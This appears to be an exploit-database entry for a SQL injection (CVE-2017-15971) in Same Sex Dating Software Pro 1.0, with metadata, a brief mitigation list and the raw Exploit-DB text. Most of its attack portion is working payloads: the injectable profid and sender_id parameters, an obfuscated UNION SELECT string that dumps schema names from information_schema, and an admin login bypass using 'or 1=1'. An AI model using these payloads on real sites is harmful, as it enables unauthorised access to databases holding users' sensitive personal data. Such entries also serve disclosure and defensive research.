Same Sex Dating Software Pro 1.0 - SQL Injection

vendor:

Same Sex Dating Software Pro

by:

Ihsan Sencan

9,8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Same Sex Dating Software Pro

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: CVE-2017-15971

CPE: a:softdatepro:same_sex_dating_software:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

Same Sex Dating Software Pro 1.0 – SQL Injection

The vulnerability allows an users to inject sql commands. Proof of Concept: http://localhost/[PATH]/viewprofile.php?profid=[SQL], http://localhost/[PATH]/viewmessage.php?sender_id=[SQL], -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- and http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.

Mitigation:

Input validation and sanitization, use of prepared statements, use of stored procedures, use of parameterized queries, use of least privilege accounts, use of web application firewalls, use of secure coding practices, use of secure authentication and authorization mechanisms.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
# Demo: http://www.ss.softdatepro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15971
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
# 
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
# 
# http://localhost/[PATH]/admin
# 
# Email: 'or 1=1 or ''=' Pass: anything
# 
# Etc..
# # # # #